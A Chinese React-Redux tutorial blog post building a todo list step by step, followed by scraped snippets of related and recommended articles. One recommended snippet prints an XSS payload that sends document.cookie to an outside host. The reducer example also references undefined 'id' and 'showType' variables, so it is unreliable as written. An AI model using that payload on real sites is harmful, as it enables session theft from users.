1.index.js文件中需要引入

a.React(把jsx编译到js需要调用一个函数, 这个函数在React叫React.createElement. 解答地址:https://segmentfault.com/q/1010000011479561,注意后面评论,查看ES6-Module),

b.ReactDOM,

c.要渲染的总组件。

示例如下:

//index.js
import React from "react";
import ReactDOM from 'react-dom';
import App from "./page/todoListRedux/app"
ReactDOM.render(<App />,document.getElementById("root"))

2.总组件中需要引入

a.React,{Component,Fragment}(Fragment页面不会渲染的包含块)

b.引入store所在位置

c.{Provider}:相当于store所作用的范围容器

d.子组件所在位置

并将总组件暴露给index

示例如下:

//app.js
import React, { Component, Fragment } from "react";
import store from "./store/store";
import { Provider } from "react-redux"; import Input from "./component/input"; export default class App extends Component {
render() {
return (
<Provider store={store}>
<Fragment>
<Input />
</Fragment>
</Provider>
)
}
}

3.store.js中需要引入

a.创建store的方法{createStore}

b.对redux的dispacth方法进行封装的方法applyMiddleware

c.rudecer(设计数据结构和actions处理)

d.thunk 实现异步action

将store暴露给总组件app.js

代码示例如下:

import { createStore, applyMiddleware } from "redux";
import reducers from "./reducers";
// import logger from "redux-logger";
import thunk from "redux-thunk"; // console.log(logger,thunk)
// import { addTodo,changeCompleted } from "./actions"
// redux-thunk实现异步action
// redux-logger是redux得日志中间件
const store = createStore(reducers,applyMiddleware(thunk))
export default store

4.actions.js

a.用变量代替action字符串

b.action接收的参数返回出去,传递给reducers

c.将action暴露给子组件(即:用户具体的操作行为)

示例如下:

export const ADD_TODO = "ADD_TODO";
export function addTodoAction({id,text}) {
return {
type: ADD_TODO,
text,
id
}
}

5.reduers.js

a.引入合并处理action方法的方法:combineReducers

b.定义state数据结构

c.定义function,根据用户操作,dispatch过来的action中的type对state数据中的具体的数据进行操作

d.合并function,将其放入reducers(注:只有合并以后的function在子组件中才能获取到)

e.将reducers暴露给store

代码示例如下:

import { combineReducers } from "redux";
const initdata = {
todoList: [{
id: 0,
text: "HTML",
completed: true
}, {
id: 1,
text: "CSS",
completed: false
}, {
id: 2,
text: "JS",
completed: true
}, {
id: 3,
text: "NodeJs",
completed: false
}],
id:4,
showType:"All"
}
function todoList(state=initdata.todoList,action){
// console.log(action)
let newArr=JSON.parse(JSON.stringify(state))
if(action.type==="ADD_TODO"){
newArr.push({
id:action.id,
text:action.text,
completed:false
})
}else if(action.type==="COMPLETED_TODO"){
newArr.map((item)=>{
if(item.id===action.id){
item.completed=!item.completed
}
return item
})
}
return newArr
}
const reducers=combineReducers({
todoList,id,showType
})
export default reducers;

6.子组件

a.引入React,{Component}

b.引入connect(连接ruducers里面的数据)

c.引入actions.js中的用户操作行为方法

d.定义组件名称,从this.props中获取自己需要的方法/数据(或参数),并根据用户行为触发不同的action,通过dispatch来对数据进行相应操作

e.连接reducers,并从中获取需要的数据放入this.props中

代码示例如下:

import React, { Component, Fragment } from "react";
import {connect} from "react-redux";
import styles from "../static/style.css"
import {changeCompleted} from "../store/actions" class List extends Component { render() {
const {dispatch,showType}=this.props
let list=this.props.todoList.filter((item)=>{
if(showType==="All"){
return item
}else if(showType==="WillDo"){
return item.completed===false
}else if(showType==="Did"){
return item.completed===true
}
})
return (
<Fragment>
<ul>
{
list.map((item,index)=>{
return <li key={index}
className={styles[item.completed?'active':""]}
onClick={()=>{
// console.log(item.id)
dispatch(changeCompleted(item.id))
}}
>{item.text}</li>
})
}
</ul>
</Fragment>
)
}
}
export default connect(function(state){
return state
})(List)

初步总结:react-redux的初步使用体验

github:https://github.com/aliAjax/reactTodoListReduxDemo.git

包含了不用redux的todoList Demo

react-redux学习初步总结的更多相关文章

  1. React Redux学习笔记

    React Router React Router 使用教程 Redux中间件middleware [译]深入浅出Redux中间件 Redux学习之一:何为middleware? ES6 ES6新特性 ...

  2. React+Redux学习笔记:React+Redux简易开发步骤

    前言 React+Redux 分为两部分: UI组件:即React组件,也叫用户自定义UI组件,用于渲染DOM 容器组件:即Redux逻辑,处理数据和业务逻辑,支持所有Redux API,参考之前的文 ...

  3. react redux学习之路

    React 自学 chapter one React新的前端思维方式 React的首要思想是通过组件(Component)来开发应用.所谓组件,简单说,指的是能够完成某个特定功能的独立的.可重用的代码 ...

  4. react与redux学习资料的整理

    **重点内容**React学习 1.新手入门可以访问react的官方网站,如果英语不是特别好的同学可以访问中文版的,具体链接http://reactjs.cn/react/index.html 首页有 ...

  5. Redux学习(3) ----- 结合React使用

    Redux 和React 进行结合, 就是用React 做UI, 因为Redux中定义了state,并且定义了改变或获取state的方法,完全可以用来进行状态管理,React中就不用保存状态了,它只要 ...

  6. react/redux组件库、模板、学习教程

    开源的有蚂蚁金服的: 1.https://pro.ant.design/index-cn 2.https://pro.ant.design/docs/getting-started-cn 3.http ...

  7. redux学习

    redux学习: 1.应用只有一个store,用于保存整个应用的所有的状态数据信息,即state,一个state对应一个页面的所需信息 注意:他只负责保存state,接收action, 从store. ...

  8. webpack+react+redux+es6开发模式

    一.预备知识 node, npm, react, redux, es6, webpack 二.学习资源 ECMAScript 6入门 React和Redux的连接react-redux Redux 入 ...

  9. react+redux官方实例TODO从最简单的入门(6)-- 完结

    通过实现了增-->删-->改-->查,对react结合redux的机制差不多已经了解,那么把剩下的功能一起完成吧 全选 1.声明状态,这个是全选状态 2.action约定 3.red ...

  10. react+redux官方实例TODO从最简单的入门(1)-- 前言

    刚进公司的时候,一点react不会,有一个需求要改,重构页面!!!完全懵逼,一点不知道怎么办!然后就去官方文档,花了一周时间,就纯react实现了页面重构,总体来说,react还是比较简单的,由于当初 ...

随机推荐

  1. vue中非父子组件的传值bus的使用

    非父子之间的组件传值,可以使用vuex.简单的状态管理,也可以用vue bus vue bus可以实现不同组件间.不同页面间的通信,比如我在A页面出发点击事件,要B页面发生变化,使用方法如下: 全局定 ...

  2. CSS设置浮动导致背景颜色设置无效的解决方法

    float浮动会使父元素高度塌陷,父级元素不能被撑开,所以导致背景颜色不能被撑开 解决方法: 对父元素设置高度 对父元素设置 overflow:hidden清除浮动 把父元素也设置为float浮动 结 ...

  3. 0502 xss

    playload <script>window.open('http://n00p.me/cookie.php?cookie='+document.cookie)</script&g ...

  4. python读取ubuntu系统磁盘挂载情况

    磁盘挂载 利用df -h  的命令 此功能主要实现了python 命令行执行函数进行解析df 返回的数据   代码如下 : # liunx 系统获取 磁盘挂载的情况 代码 #!/usr/bin/pyt ...

  5. SpringMVC的工作原理(转)

    SpringMVC的工作原理图: SpringMVC流程 1.  用户发送请求至前端控制器DispatcherServlet. 2.  DispatcherServlet收到请求调用HandlerMa ...

  6. linux 中free命令

    1.free 命令的选项使用 free 命令查看服务器内存使用情况.free [-b|-k|-m|-g|-h] [-l] [-o] [-t] [-s delay] [-c count] [-V](1) ...

  7. Tomcat 输出日志出现中文乱码

    Tomcat 输出日志出现中文乱码 解决方案: 打开到tomcat安装目录下的conf/文件夹 修改logging.properties文件,找到 java.util.logging.ConsoleH ...

  8. 【Java并发】锁机制

    一.重入锁 二.读写锁 三.悲观锁.乐观锁 3.1 悲观锁 3.2 乐观锁 3.3 CAS操作方式 3.4 CAS算法理解 3.5 CAS(乐观锁算法) 3.6 CAS缺点 四.原子类 4.1 概述 ...

  9. 实时跟踪之TRACA

    背景: 目前,在实时跟踪领域存在着越来越多的先进方法,同时也极大地促进了该领域的发展.主要有两种不同的基于深度学习的跟踪方法:1.由在线跟踪器组成,这些跟踪器依赖网络连续的微调来学习目标的变化外观,精 ...

  10. 使用EasyUI查询与删除

    下面我们创建一个使用EasyUI布局的asp.net网站查询与删除数据(连接数据库) 新建网站-新建数据库(一个表,主要作用是了解一下easyUI的使用) 打开EasyUI帮助文档,自行渲染 使用da ...